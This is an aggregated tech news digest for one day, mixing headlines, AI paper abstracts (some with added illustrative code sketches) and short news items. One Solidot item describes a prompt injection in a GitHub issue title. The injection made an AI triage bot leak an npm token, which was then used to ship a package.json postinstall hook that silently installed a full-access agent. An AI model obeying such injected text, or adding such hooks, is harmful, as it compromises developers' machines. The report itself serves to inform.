OrangeBot.AI Digest — 2026-03-08
87 headlines across 8 sources, aggregated for this day.
Hacker News(15)
- Agent Safehouse – macOS-native sandboxing for local agents (agent-safehouse.dev)
- Ask HN: Please restrict new accounts from posting
- Show HN: I built a real-time OSINT dashboard pulling 15 live global feeds (github.com)
- LibreOffice Writer now supports Markdown (blog.documentfoundation.org)
- Claude struggles to cope with ChatGPT exodus (www.forbes.com)
- The changing goalposts of AGI and timelines (mlumiste.com)
- Living human brain cells play DOOM on a CL1 [video] (www.youtube.com)
- Oracle may slash up to 30k jobs to fund AI data-centers as US banks retreat (www.cio.com)
- FrameBook (fb.edoo.gg)
- LibreOffice: Request to the European Commission to adhere to its own guidances (blog.documentfoundation.org)
- Why can't you tune your guitar? (2019) (www.ethanhein.com)
- How Big Diaper absorbs billions of extra dollars from American parents (thehustle.co)
- Ask HN: How to be alone?
- I ported Linux to the PS5 and turned it into a Steam Machine (xcancel.com)
- Apple's 512GB Mac Studio vanishes, a quiet acknowledgment of the RAM shortage (arstechnica.com)
GitHub Trending(12)
Product Hunt(15)
- Pulldog
A Mac application to keep your code reviews organized!
- GetMimic
Generate viral social & chat mockups in seconds with AI.
- Vibe Marketplace by Greta
Sell what you ship, instantly
- Claude Marketplace
Helping companies easily get the AI tools they need
- Song Sweeper
Remove duplicate songs
- LTX Desktop
Local open-source LTX video editor optimized for GPUs
- TestSprite 2.1
Agentic testing for the AI-native team.
- Olmo Hybrid
7B open model mixing transformers and linear RNNs
- NotchPad
The secure notepad and clipboard manager for your Mac.
- Variant
Endless designs for your ideas, just scroll.
- Copperlane
Turn hours of loan processing into seconds
- Thinking Line
AI-powered doodle video and vector generator
- 21st Agents SDK
SDK to add a Claude Code AI agent to your app
- GetBeel
Let AI collect invoices and handle reconciliation automatically
- Codex Security
Our application security agent
Hugging Face(15)
- MOOSE-Star: Unlocking Tractable Training for Scientific Discovery by Breaking the Complexity Barrier
While large language models (LLMs) show promise in scientific discovery, existing research focuses on inference or feedback-driven training, leaving the direct modeling of the generative reasoning process, P(hypothesis|background) (P(h|b)), unexplored. We demonstrate that directly training P(h|b) is mathematically intractable due to the combinatorial complexity (O(N^k)) inherent in retrieving and composing inspirations from a vast knowledge base. To break this barrier, we introduce MOOSE-Star, a unified framework enabling tractable training and scalable inference. In the best case, MOOSE-Star reduces complexity from exponential to logarithmic (O(log N)) by (1) training on decomposed subtasks derived from the probabilistic equation of discovery, (2) employing motivation-guided hierarchical search to enable logarithmic retrieval and prune irrelevant subspaces, and (3) utilizing bounded composition for robustness against retrieval noise. To facilitate this, we release TOMATO-Star, a dataset of 108,717 decomposed papers (38,400 GPU hours) for training. Furthermore, we show that while brute-force sampling hits a "complexity wall," MOOSE-Star exhibits continuous test-time scaling.
- SkillNet: Create, Evaluate, and Connect AI Skills
Current AI agents can flexibly invoke tools and execute complex tasks, yet their long-term advancement is hindered by the lack of systematic accumulation and transfer of skills. Without a unified mechanism for skill consolidation, agents frequently "reinvent the wheel", rediscovering solutions in isolated contexts without leveraging prior strategies. To overcome this limitation, we introduce SkillNet, an open infrastructure designed to create, evaluate, and organize AI skills at scale. SkillNet structures skills within a unified ontology that supports creating skills from heterogeneous sources, establishing rich relational connections, and performing multi-dimensional evaluation across Safety, Completeness, Executability, Maintainability, and Cost-awareness. Our infrastructure integrates a repository of over 200,000 skills, an interactive platform, and a versatile Python toolkit. Experimental evaluations on ALFWorld, WebShop, and ScienceWorld demonstrate that SkillNet significantly enhances agent performance, improving average rewards by 40% and reducing execution steps by 30% across multiple backbone models. By formalizing skills as evolving, composable assets, SkillNet provides a robust foundation for agents to move from transient experience to durable mastery.
- DARE: Aligning LLM Agents with the R Statistical Ecosystem via Distribution-Aware Retrieval
Large Language Model (LLM) agents can automate data-science workflows, but many rigorous statistical methods implemented in R remain underused because LLMs struggle with statistical knowledge and tool retrieval. Existing retrieval-augmented approaches focus on function-level semantics and ignore data distribution, producing suboptimal matches. We propose DARE (Distribution-Aware Retrieval Embedding), a lightweight, plug-and-play retrieval model that incorporates data distribution information into function representations for R package retrieval. Our main contributions are: (i) RPKB, a curated R Package Knowledge Base derived from 8,191 high-quality CRAN packages; (ii) DARE, an embedding model that fuses distributional features with function metadata to improve retrieval relevance; and (iii) RCodingAgent, an R-oriented LLM agent for reliable R code generation and a suite of statistical analysis tasks for systematically evaluating LLM agents in realistic analytical scenarios. Empirically, DARE achieves an NDCG@10 of 93.47%, outperforming state-of-the-art open-source embedding models by up to 17% on package retrieval while using substantially fewer parameters. Integrating DARE into RCodingAgent yields significant gains on downstream analysis tasks. This work helps narrow the gap between LLM automation and the mature R statistical ecosystem.
- AgentVista: Evaluating Multimodal Agents in Ultra-Challenging Realistic Visual Scenarios
Real-world multimodal agents solve multi-step workflows grounded in visual evidence. For example, an agent can troubleshoot a device by linking a wiring photo to a schematic and validating the fix with online documentation, or plan a trip by interpreting a transit map and checking schedules under routing constraints. However, existing multimodal benchmarks mainly evaluate single-turn visual reasoning or specific tool skills, and they do not fully capture the realism, visual subtlety, and long-horizon tool use that practical agents require. We introduce AgentVista, a benchmark for generalist multimodal agents that spans 25 sub-domains across 7 categories, pairing realistic and detail-rich visual scenarios with natural hybrid tool use. Tasks require long-horizon tool interactions across modalities, including web search, image search, page navigation, and code-based operations for both image processing and general programming. Comprehensive evaluation of state-of-the-art models exposes significant gaps in their ability to carry out long-horizon multimodal tool use. Even the best model in our evaluation, Gemini-3-Pro with tools, achieves only 27.3% overall accuracy, and hard instances can require more than 25 tool-calling turns. We expect AgentVista to accelerate the development of more capable and reliable multimodal agents for realistic and ultra-challenging problem solving.
- RoboPocket: Improve Robot Policies Instantly with Your Phone
Scaling imitation learning is fundamentally constrained by the efficiency of data collection. While handheld interfaces have emerged as a scalable solution for in-the-wild data acquisition, they predominantly operate in an open-loop manner: operators blindly collect demonstrations without knowing the underlying policy's weaknesses, leading to inefficient coverage of critical state distributions. Conversely, interactive methods like DAgger effectively address covariate shift but rely on physical robot execution, which is costly and difficult to scale. To reconcile this trade-off, we introduce RoboPocket, a portable system that enables Robot-Free Instant Policy Iteration using single consumer smartphones. Its core innovation is a Remote Inference framework that visualizes the policy's predicted trajectory via Augmented Reality (AR) Visual Foresight. This immersive feedback allows collectors to proactively identify potential failures and focus data collection on the policy's weak regions without requiring a physical robot. Furthermore, we implement an asynchronous Online Finetuning pipeline that continuously updates the policy with incoming data, effectively closing the learning loop in minutes. Extensive experiments demonstrate that RoboPocket adheres to data scaling laws and doubles the data efficiency compared to offline scaling strategies, overcoming their long-standing efficiency bottleneck. Moreover, our instant iteration loop also boosts sample efficiency by up to 2x in distributed environments with a small number of interactive corrections per person. Project page and videos: https://robo-pocket.github.io.
- HiFi-Inpaint: Towards High-Fidelity Reference-Based Inpainting for Generating Detail-Preserving Human-Product Images
Human-product images, which showcase the integration of humans and products, play a vital role in advertising, e-commerce, and digital marketing. The essential challenge of generating such images lies in ensuring the high-fidelity preservation of product details. Among existing paradigms, reference-based inpainting offers a targeted solution by leveraging product reference images to guide the inpainting process. However, limitations remain in three key aspects: the lack of diverse large-scale training data, the struggle of current models to focus on product detail preservation, and the inability of coarse supervision for achieving precise guidance. To address these issues, we propose HiFi-Inpaint, a novel high-fidelity reference-based inpainting framework tailored for generating human-product images. HiFi-Inpaint introduces Shared Enhancement Attention (SEA) to refine fine-grained product features and Detail-Aware Loss (DAL) to enforce precise pixel-level supervision using high-frequency maps. Additionally, we construct a new dataset, HP-Image-40K, with samples curated from self-synthesis data and processed with automatic filtering. Experimental results show that HiFi-Inpaint achieves state-of-the-art performance, delivering detail-preserving human-product images.
- Interactive Benchmarks
Standard benchmarks have become increasingly unreliable due to saturation, subjectivity, and poor generalization. We argue that evaluating model's ability to acquire information actively is important to assess model's intelligence. We propose Interactive Benchmarks, a unified evaluation paradigm that assesses model's reasoning ability in an interactive process under budget constraints. We instantiate this framework across two settings: Interactive Proofs, where models interact with a judge to deduce objective truths or answers in logic and mathematics; and Interactive Games, where models reason strategically to maximize long-horizon utilities. Our results show that interactive benchmarks provide a robust and faithful assessment of model intelligence, revealing that there is still substantial room to improve in interactive scenarios. Project page: https://github.com/interactivebench/interactivebench
- Large Multimodal Models as General In-Context Classifiers
Which multimodal model should we use for classification? Previous studies suggest that the answer lies in CLIP-like contrastive Vision-Language Models (VLMs), due to their remarkable performance in zero-shot classification. In contrast, Large Multimodal Models (LMMs) are more suitable for complex tasks. In this work, we argue that this answer overlooks an important capability of LMMs: in-context learning. We benchmark state-of-the-art LMMs on diverse datasets for closed-world classification and find that, although their zero-shot performance is lower than CLIP's, LMMs with a few in-context examples can match or even surpass contrastive VLMs with cache-based adapters, their "in-context" equivalent. We extend this analysis to the open-world setting, where the generative nature of LMMs makes them more suitable for the task. In this challenging scenario, LMMs struggle whenever provided with imperfect context information. To address this issue, we propose CIRCLE, a simple training-free method that assigns pseudo-labels to in-context examples, iteratively refining them with the available context itself. Through extensive experiments, we show that CIRCLE establishes a robust baseline for open-world classification, surpassing VLM counterparts and highlighting the potential of LMMs to serve as unified classifiers, and a flexible alternative to specialized models.
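The pseudo-labeling idea behind a method like CIRCLE can be illustrated with a toy sketch. This is not the paper's implementation; the 3-nearest-neighbor vote, cosine similarity, and convergence rule here are illustrative assumptions. Noisy labels over an in-context set are repeatedly re-estimated from each example's neighbors until the set becomes self-consistent:

```python
import numpy as np

def refine_pseudo_labels(embeddings, labels, n_classes, iters=5):
    """Iteratively re-estimate each example's pseudo-label from the
    current labels of its 3 nearest neighbors (cosine similarity),
    so a noisy in-context set gradually becomes self-consistent."""
    labels = labels.copy()
    normed = embeddings / np.linalg.norm(embeddings, axis=1, keepdims=True)
    sim = normed @ normed.T
    np.fill_diagonal(sim, -np.inf)          # never vote for yourself
    for _ in range(iters):
        new_labels = labels.copy()
        for i in range(len(labels)):
            nbrs = np.argsort(sim[i])[-3:]  # indices of 3 nearest neighbors
            votes = np.bincount(labels[nbrs], minlength=n_classes)
            new_labels[i] = int(votes.argmax())
        if np.array_equal(new_labels, labels):
            break                           # converged
        labels = new_labels
    return labels
```

With two well-separated clusters and a single mislabeled example, a couple of voting rounds restore the correct labels.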
- DreamWorld: Unified World Modeling in Video Generation
Despite impressive progress in video generation, existing models remain limited to surface-level plausibility, lacking a coherent and unified understanding of the world. Prior approaches typically incorporate only a single form of world-related knowledge or rely on rigid alignment strategies to introduce additional knowledge. However, aligning the single world knowledge is insufficient to constitute a world model that requires jointly modeling multiple heterogeneous dimensions (e.g., physical commonsense, 3D and temporal consistency). To address this limitation, we introduce DreamWorld, a unified framework that integrates complementary world knowledge into video generators via a Joint World Modeling Paradigm, jointly predicting video pixels and features from foundation models to capture temporal dynamics, spatial geometry, and semantic consistency. However, naively optimizing these heterogeneous objectives can lead to visual instability and temporal flickering. To mitigate this issue, we propose Consistent Constraint Annealing (CCA) to progressively regulate world-level constraints during training, and Multi-Source Inner-Guidance to enforce learned world priors at inference. Extensive evaluations show that DreamWorld improves world consistency, outperforming Wan2.1 by 2.26 points on VBench. Code will be made publicly available at https://github.com/ABU121111/DreamWorld.
- SageBwd: A Trainable Low-bit Attention
Low-bit attention, such as SageAttention, has emerged as an effective approach for accelerating model inference, but its applicability to training remains poorly understood. In prior work, we introduced SageBwd, a trainable INT8 attention that quantizes six of seven attention matrix multiplications while preserving fine-tuning performance. However, SageBwd exhibited a persistent performance gap to full-precision attention (FPA) during pre-training. In this work, we investigate why this gap occurs and demonstrate that SageBwd matches full-precision attention during pretraining. Through experiments and theoretical analysis, we reach a few important insights and conclusions: (i) QK-norm is necessary for stable training at large tokens per step, (ii) quantization errors primarily arise from the backward-pass score gradient dS, (iii) reducing tokens per step enables SageBwd to match FPA performance in pre-training, and (iv) K-smoothing remains essential for training stability, while Q-smoothing provides limited benefit during pre-training.
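Low-bit attention of this kind ultimately rests on quantized matrix multiplications. A minimal numpy sketch (generic symmetric per-tensor INT8 quantization, not SageBwd's actual kernel or its smoothing scheme) shows how an attention-style matmul can run in INT8 with small relative error:

```python
import numpy as np

def quantize_int8(x):
    """Symmetric per-tensor INT8 quantization: map [-max, max] to [-127, 127]."""
    scale = np.abs(x).max() / 127.0
    q = np.clip(np.round(x / scale), -127, 127).astype(np.int8)
    return q, scale

def int8_matmul(a, b):
    """Quantize both operands, accumulate in int32, then dequantize."""
    qa, sa = quantize_int8(a)
    qb, sb = quantize_int8(b)
    return qa.astype(np.int32) @ qb.astype(np.int32) * (sa * sb)

rng = np.random.default_rng(0)
q, k = rng.normal(size=(64, 32)), rng.normal(size=(32, 64))
exact = q @ k                        # full-precision attention-score matmul
approx = int8_matmul(q, k)
rel_err = np.abs(approx - exact).mean() / np.abs(exact).mean()
```

The forward scores survive quantization with roughly percent-level error; the paper's finding is that the backward-pass score gradient dS is where quantization error concentrates.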
- Timer-S1: A Billion-Scale Time Series Foundation Model with Serial Scaling
We introduce Timer-S1, a strong Mixture-of-Experts (MoE) time series foundation model with 8.3B total parameters, 0.75B activated parameters for each token, and a context length of 11.5K. To overcome the scalability bottleneck in existing pre-trained time series foundation models, we perform Serial Scaling in three dimensions: model architecture, dataset, and training pipeline. Timer-S1 integrates sparse TimeMoE blocks and generic TimeSTP blocks for Serial-Token Prediction (STP), a generic training objective that adheres to the serial nature of forecasting. The proposed paradigm introduces serial computations to improve long-term predictions while avoiding costly rolling-style inference and pronounced error accumulation in the standard next-token prediction. Pursuing a high-quality and unbiased training dataset, we curate TimeBench, a corpus with one trillion time points, and apply meticulous data augmentation to mitigate predictive bias. We further pioneer a post-training stage, including continued pre-training and long-context extension, to enhance short-term and long-context performance. Evaluated on the large-scale GIFT-Eval leaderboard, Timer-S1 achieves state-of-the-art forecasting performance, attaining the best MASE and CRPS scores as a pre-trained model. Timer-S1 will be released to facilitate further research.
- RealWonder: Real-Time Physical Action-Conditioned Video Generation
Current video generation models cannot simulate physical consequences of 3D actions like forces and robotic manipulations, as they lack structural understanding of how actions affect 3D scenes. We present RealWonder, the first real-time system for action-conditioned video generation from a single image. Our key insight is using physics simulation as an intermediate bridge: instead of directly encoding continuous actions, we translate them through physics simulation into visual representations (optical flow and RGB) that video models can process. RealWonder integrates three components: 3D reconstruction from single images, physics simulation, and a distilled video generator requiring only 4 diffusion steps. Our system achieves 13.2 FPS at 480x832 resolution, enabling interactive exploration of forces, robot actions, and camera controls on rigid objects, deformable bodies, fluids, and granular materials. We envision RealWonder opens new opportunities to apply video models in immersive experiences, AR/VR, and robot learning. Our code and model weights are publicly available in our project website: https://liuwei283.github.io/RealWonder/
- MASQuant: Modality-Aware Smoothing Quantization for Multimodal Large Language Models
Post-training quantization (PTQ) with computational invariance for Large Language Models (LLMs) has demonstrated remarkable advances; however, its application to Multimodal Large Language Models (MLLMs) presents substantial challenges. In this paper, we analyze SmoothQuant as a case study and identify two critical issues: Smoothing Misalignment and Cross-Modal Computational Invariance. To address these issues, we propose Modality-Aware Smoothing Quantization (MASQuant), a novel framework that introduces (1) Modality-Aware Smoothing (MAS), which learns separate, modality-specific smoothing factors to prevent Smoothing Misalignment, and (2) Cross-Modal Compensation (CMC), which addresses Cross-modal Computational Invariance by using SVD whitening to transform multi-modal activation differences into low-rank forms, enabling unified quantization across modalities. MASQuant demonstrates stable quantization performance across both dual-modal and tri-modal MLLMs. Experimental results show that MASQuant is competitive among the state-of-the-art PTQ algorithms. Source code: https://github.com/alibaba/EfficientAI.
- Locality-Attending Vision Transformer
Vision transformers have demonstrated remarkable success in classification by leveraging global self-attention to capture long-range dependencies. However, this same mechanism can obscure fine-grained spatial details crucial for tasks such as segmentation. In this work, we seek to enhance segmentation performance of vision transformers after standard image-level classification training. More specifically, we present a simple yet effective add-on that improves performance on segmentation tasks while retaining vision transformers' image-level recognition capabilities. In our approach, we modulate the self-attention with a learnable Gaussian kernel that biases the attention toward neighboring patches. We further refine the patch representations to learn better embeddings at patch positions. These modifications encourage tokens to focus on local surroundings and ensure meaningful representations at spatial positions, while still preserving the model's ability to incorporate global information. Experiments demonstrate the effectiveness of our modifications, evidenced by substantial segmentation gains on three benchmarks (e.g., over 6% and 4% on ADE20K for ViT Tiny and Base), without changing the training regime or sacrificing classification performance. The code is available at https://github.com/sinahmr/LocAtViT/.
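The locality mechanism described above, biasing attention toward neighboring patches with a Gaussian kernel, can be sketched as an additive log-space penalty on the attention logits. This is a simplified single-head version: the paper's kernel is learnable, while the bandwidth sigma here is a fixed illustrative parameter.

```python
import numpy as np

def softmax(x, axis=-1):
    e = np.exp(x - x.max(axis=axis, keepdims=True))
    return e / e.sum(axis=axis, keepdims=True)

def local_attention(q, k, v, positions, sigma=1.5):
    """Self-attention whose logits receive an additive Gaussian locality
    bias, -dist^2 / (2*sigma^2), steering each token toward its spatial
    neighbors while global content-based attention is preserved."""
    logits = q @ k.T / np.sqrt(q.shape[-1])
    diff = positions[:, None, :] - positions[None, :, :]
    dist2 = (diff ** 2).sum(-1)             # pairwise squared patch distances
    logits = logits - dist2 / (2 * sigma ** 2)
    return softmax(logits, axis=-1) @ v
```

With zero queries and keys and an identity value matrix, the output rows are pure locality weights: the self patch and its neighbors dominate distant ones.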
- UltraDexGrasp: Learning Universal Dexterous Grasping for Bimanual Robots with Synthetic Data
Grasping is a fundamental capability for robots to interact with the physical world. Humans, equipped with two hands, autonomously select appropriate grasp strategies based on the shape, size, and weight of objects, enabling robust grasping and subsequent manipulation. In contrast, current robotic grasping remains limited, particularly in multi-strategy settings. Although substantial efforts have targeted parallel-gripper and single-hand grasping, dexterous grasping for bimanual robots remains underexplored, with data being a primary bottleneck. Achieving physically plausible and geometrically conforming grasps that can withstand external wrenches poses significant challenges. To address these issues, we introduce UltraDexGrasp, a framework for universal dexterous grasping with bimanual robots. The proposed data-generation pipeline integrates optimization-based grasp synthesis with planning-based demonstration generation, yielding high-quality and diverse trajectories across multiple grasp strategies. With this framework, we curate UltraDexGrasp-20M, a large-scale, multi-strategy grasp dataset comprising 20 million frames across 1,000 objects. Based on UltraDexGrasp-20M, we further develop a simple yet effective grasp policy that takes point clouds as input, aggregates scene features via unidirectional attention, and predicts control commands. Trained exclusively on synthetic data, the policy achieves robust zero-shot sim-to-real transfer and consistently succeeds on novel objects with varied shapes, sizes, and weights, attaining an average success rate of 81.2% in real-world universal dexterous grasping. To facilitate future research on grasping with bimanual robots, we open-source the data generation pipeline at https://github.com/InternRobotics/UltraDexGrasp.
Techmeme(15)
- Luma AI debuts Uni-1, an image model that combines image understanding and generation in a single architecture, topping Nano Banana 2 on logic-based benchmarks (Matthias Bastian/The Decoder)
Like Google's Nano Banana Pro and GPT Image 1.5, Uni-1 is built on an autoregressive transformer …
- How Circle, Stripe, Coinbase, and others are building stablecoin-based agentic payments infrastructure that makes microtransactions between AI agents economical (Emily Mason/Bloomberg)
Circle Internet Group Inc. and Stripe Inc. are racing to build payments systems for a world that doesn't exist yet …
- The US and Israel are using AI to wage war on Iran with unprecedented speed and precision in attacks, even as the cost of ill-informed decisions remains high (Wall Street Journal)
Intelligence, targeting and damage assessments are accelerating thanks to military versions of software now remaking business and daily life
- A look at countries that moved to ban social media for kids in recent months, including Australia, Denmark, France, Germany, Greece, Malaysia, Spain, Indonesia (Aisha Malik/TechCrunch)
Over the past few months, several countries have announced plans to restrict social media access for children and teens.
- ZyG, whose software coordinates AI agents across SEO, marketing, and more for DTC brands, raised a $58M seed co-led by Bessemer, Viola Ventures, and Lightspeed (Mike Wheatley/SiliconANGLE)
When it comes to product innovation, global brands have an enormous advantage over smaller companies thanks to their massive scale …
- Thoughts on MacBook Neo, as Apple also expands its superpremium tier via "Ultra" products; sources: Apple wants to use aluminum 3D-printing for Watch and iPhone (Mark Gurman/Bloomberg)
Apple has taken the wraps off its $599 MacBook Neo, entering new territory in a way that could shake up the computer market.
- A study finds LLMs from Anthropic, Google, OpenAI, and xAI can help with academic fraud, specifically helping non-researchers submit fabricated papers to arXiv (Elizabeth Gibney/Nature)
All major large language models (LLMs) …
- A profile of Emil Michael, who made his name as an aggressive dealmaker for Uber, as he takes a leading role in the Pentagon's dispute with Anthropic (Rebecca Torrence/Bloomberg)
Emil Michael made his name in Silicon Valley a decade ago as an aggressive dealmaker for a startup, Uber Technologies Inc. …
- German quick grocery delivery startup Flink raised $100M led by Prosus, a source says at a $900M valuation; Flink was reportedly valued at $5B in May 2022 (Christina Kyriasoglou/Bloomberg)
Flink SE raised funds in a round that values the firm at $900 million, in a sign that the grocery delivery startup has stabilized …
- Samsung's consumer device chief TM Roh says it is "open to strategic co-operation" with more AI groups, having recently added Perplexity to its mobile OS (Michael Acton/Financial Times)
Korean giant's device chief says its future Galaxy devices will host multiple models as users mix and match AI tools
- Guild.ai, which helps companies develop, deploy, and observe AI agents, raised a $14M seed and $30M Series A, both led by GV, and is now valued at $300M (Chris Metinko/Axios)
Guild.ai, a startup helping companies develop AI agents, has raised $44 million in a seed and Series A and is now valued at $300 million …
- Documents show two DOGE employees used ChatGPT to identify National Endowment for the Humanities grants, worth over $100M, to be cut for being related to DEI (Jennifer Schuessler/New York Times)
Documents show how A.I. was used to cancel most previously approved grants by the National Endowment for the Humanities as the agency embraced President Trump's agenda.
- As cheap, powerful GPS jammers proliferate, a look at some alternatives to GPS, including using supersensitive, quantum-based magnetic sensors (Christopher Mims/Wall Street Journal)
The proliferation of cheap, powerful GPS jammers has airline operators, shipping firms and militaries alike scrambling for navigation alternatives
- Iran targeting commercial datacenters in the UAE and Bahrain signals a new frontier in asymmetric warfare and raises doubts over the Gulf as a global AI hub (Daniel Boffey/The Guardian)
Iran's targeting of commercial datacentres in the UAE and Bahrain signals a new frontier in asymmetric warfare
- Leading the Future, a pro-AI PAC backed by Palantir-cofounder Joe Lonsdale, hit pro-regulation Democrat Alex Bores with attack ads over Bores' work for Palantir (Nancy Scola/Politico)
Alex Bores had known for a while that a political operation called Leading the Future, funded …
Solidot(15)
- Indonesia and India's Karnataka state to ban social media for under-16s
Following Australia, the Indian tech hub state of Karnataka and Indonesia have both announced bans on under-16s using social media and other high-risk digital platforms. Indonesia's Minister of Communication and Digital Affairs Meutya Hafid said in a statement on Friday that, starting March 28, the government will deactivate accounts held by under-16s on "high-risk platforms" in phases. The first affected platforms include YouTube, TikTok, Facebook, Instagram, Threads, X, Bigo Live, and the gaming platform Roblox. Meutya said the ban responds to the threats minors face from online pornography, cyberbullying, online scams, and internet addiction. In Karnataka, legislators introduced a bill at Friday's state budget session to bar under-16s from social media apps, which would make it the first Indian state to enforce such a ban. Legislator Rizwan said: "Teenagers start using social media without understanding the consequences. We will discuss with the public how to enforce age limits on social media."
- NASA's DART spacecraft confirmed to have altered an asteroid's orbit
NASA's Double Asteroid Redirection Test (DART) spacecraft struck the asteroid Dimorphos in September 2022, the world's first planetary-defense technology demonstration. The impact not only changed Dimorphos's motion around its larger companion Didymos but also measurably altered the binary pair's orbit around the Sun. Observations show that the pair's roughly 770-day solar orbital period shortened by 0.15 seconds, the first time a human-made object has been measured to change a celestial body's orbit around the Sun. Earlier studies had found that the impact shortened Dimorphos's roughly 12-hour orbit around the roughly 805-meter-wide Didymos by 33 minutes. The new research indicates that debris ejected by the impact changed the system's orbital velocity by about 11.7 micrometers per second, shifting its solar orbital period by 0.15 seconds. Although this is an extremely small orbital change, it can accumulate into a significant offset over time and could even determine whether a potentially hazardous asteroid hits Earth.
- Planet Labs halts satellite imagery releases after photos revealed damage to US military bases
Over the past few days, Planet Labs satellite imagery showed battle damage at US military bases in the Middle East, including images of a mobile THAAD radar that had been attacked. On Friday, Planet announced it would stop releasing satellite imagery of certain regions. Planet operates hundreds of Earth-imaging satellites capable of observing every piece of land on Earth once a day. Its customers include think tanks, NGOs, academic institutions, news media, and commercial users in industries such as agriculture, forestry, and energy. It also holds contracts to sell satellite imagery to the US military and intelligence agencies. Planet announced a mandatory 96-hour publication delay for satellite imagery of the affected regions.
- AI translation tools insert "hallucinations" into Wikipedia articles
Wikipedia editors have implemented a new policy restricting contributors who use AI translation tools to translate English articles into other languages, after discovering that the tools insert "hallucinations", content absent from the original, into translations. The problem involves the nonprofit Open Knowledge Association (OKA), which relies largely on low-paid contract translators from the Global South to translate English Wikipedia articles into other languages. Some translators began using tools such as Google Gemini and ChatGPT to speed up their work, but editors reviewing the translations found numerous errors, including factual mistakes, missing citations, and citations of irrelevant sources.
- Apple blocks US users from downloading ByteDance's other apps
US iPhone users with Chinese App Store accounts report that they can no longer download or update ByteDance's other apps, instead seeing the warning "This app is not available in your country or region." Apple is complying with the TikTok law passed by the US Congress in 2024, the Protecting Americans from Foreign Adversary Controlled Applications Act. The law primarily targets TikTok but also covers ByteDance's other apps, such as Douyin (TikTok's Chinese version), the AI assistant Doubao, and the reading platform Fanqie Novel.
- Asteroid 2024 YR4 will not hit the Moon
Asteroid 2024 YR4, which drew widespread attention last year as the most dangerous asteroid discovered in nearly 20 years, had already been ruled out as an Earth impactor but retained a 4% chance of striking the Moon on December 22, 2032. According to the latest observations by astronomers using the James Webb Space Telescope's NIRCam near-infrared camera, it will not hit the Moon either: 2024 YR4 will pass safely more than 20,000 kilometers away.
- OpenWrt 25.12.0 released
OpenWrt, the distribution for routers and other embedded devices, has released v25.12.0. The release is named after Dave Täht, who died on April 1, 2025. A co-founder of the Bufferbloat project, he worked to reduce network latency, and his work made countless people's connections faster and more reliable. Major changes include: the package manager switches from the no-longer-maintained opkg to apk; attended.sysupgrade in LuCI greatly simplifies the upgrade process; shell history is preserved; and many new devices are supported, bringing the total to over 2,200.
- Study finds less frequent GLP-1 dosing still maintains weight loss
GLP-1 weight-loss drugs have changed the lives of countless people with obesity, but those who stop taking them usually regain most of the weight they lost. The drugs are expensive, and lifelong use imposes a heavy financial burden. A study published in Obesity explored whether spending on the drugs can be reduced while keeping the weight off. In a small trial, taking GLP-1 drugs less frequently still maintained the weight loss. Thirty people on the drugs participated; 23 switched to dosing every two weeks or at least every 10 days, while the other 7 went even longer between doses. The researchers found that almost everyone's post-weight-loss BMI remained stable, with only 5 participants regaining a small amount. Four returned to their original dosing schedule after regaining weight. The researchers say the findings need validation at a larger scale.
- US Congress extends the ISS to 2032, directs NASA to shift to commercial stations
A recently revised Senate authorization bill extends the International Space Station's life from 2030 to 2032 while directing NASA to accelerate its transition to commercial space stations. The bill requires NASA, within 60 days of enactment, to publish its requirements for commercial low-Earth-orbit stations; within 90 days, to issue a final request for proposals to industry; and within 180 days, to sign contracts with two or more commercial providers. Private companies including Axiom Space, Blue Origin, Vast, and Voyager are finalizing commercial station designs, and all want NASA to provide more detail on its requirements, such as how long astronauts will stay aboard and what types of scientific equipment are needed.
- LGPL-licensed code rewritten with AI and relicensed under MIT
Relicensing an open-source project is notoriously difficult, since it usually requires the consent of everyone who has ever contributed a line of code, a near-impossible task for long-lived projects. The Python character-encoding detector chardet was ported from a C++ Mozilla project and adopted the same LGPL license, which is not especially friendly to commercial use. The maintainer recently rewrote the library with the help of Claude Code, released v7.0.0, and changed the license from LGPL to MIT. The original project's author, a2mark, argues that this constitutes a potential GPL violation: because the developer had been exposed to the original code, the rewrite is not a clean-room implementation, making the claim of a complete rewrite meaningless.
- LLM prompt-injection flaw leads to compromise of 4,000 developer machines
On February 17, 2026, someone published cline@2.3.0 on npm. It was essentially identical to previous versions except for one line added to package.json: "postinstall": "npm install -g openclaw@latest". Over the next eight hours, every developer who installed or updated Cline had OpenClaw, an AI agent with full system access, globally installed on their machine without consent. The package was downloaded about 4,000 times before it was pulled. The interesting part is not the payload but how the attacker obtained the npm token in the first place: a prompt was injected into a GitHub issue title, and an AI triage bot read it, interpreted it as an instruction, and executed it.
- Microsoft confirms next-generation Xbox, codenamed Project Helix
Asha Sharma, Microsoft's newly appointed head of gaming, confirmed that the company is developing a next-generation Xbox console codenamed Project Helix. Little concrete information is available, but the console appears likely to resemble Valve's Linux-based Steam Machine, blurring the line between console and PC and running both Xbox and PC games. To preserve backward compatibility, the new console will probably continue to use an AMD SoC, combining Xbox hardware with PC architecture. Project Helix could mark a major structural shift in the console ecosystem, from closed hardware platforms toward something closer to a unified PC-console environment.
- Japan approves its first iPS-cell regenerative medicine products
Japan's Ministry of Health, Labour and Welfare has granted conditional, time-limited approval for the manufacture and sale of regenerative medicine products made from induced pluripotent stem (iPS) cells, a world first for the practical application of iPS cells in regenerative medicine. The approved products are ReHeart, for severe heart failure, and Amchepry, for Parkinson's disease. ReHeart is expected to cost over 10 million yen (about 440,000 yuan), and Amchepry is also expensive. The approval runs for 7 years; if effectiveness is confirmed through treatment, it will convert to unconditional approval. ReHeart treats severe heart failure caused by ischemic cardiomyopathy, in which blocked vessels keep blood from reaching the heart: cardiomyocytes derived from donor iPS cells are grown into thin sheets and attached to the surface of the heart to stimulate the growth of new blood vessels. It was developed by Cuorips (Tokyo), a startup spun out of Osaka University. Amchepry targets Parkinson's disease, in which the loss of dopamine-releasing neurons in the brain causes rigidity and tremors in the limbs: donor iPS cells are grown into dopamine-releasing neural precursor cells and transplanted into the brain, which may offer a cure. It was developed by Sumitomo Pharma (Osaka).
- GTC 2026 sessions for startups and investors
From March 16 to 19, the NVIDIA Inception startup acceleration program, together with startup-ecosystem partners, leading member companies, and senior investors from its venture alliance, will present a new special session series at GTC 2026, including three talks aimed at Chinese entrepreneurs. Topics cover China's startup-ecosystem landscape, frontier technology trends, the 2025 outlook for China's AI market, and investment directions in key industries, offering a panorama of current hot topics in AI entrepreneurship and frontier technology. GTC will also feature an Inception Startup Pavilion, an investor AI Day, and pitch sessions for startups and investment firms.
- One in ten Firefox crashes is caused by bit flips
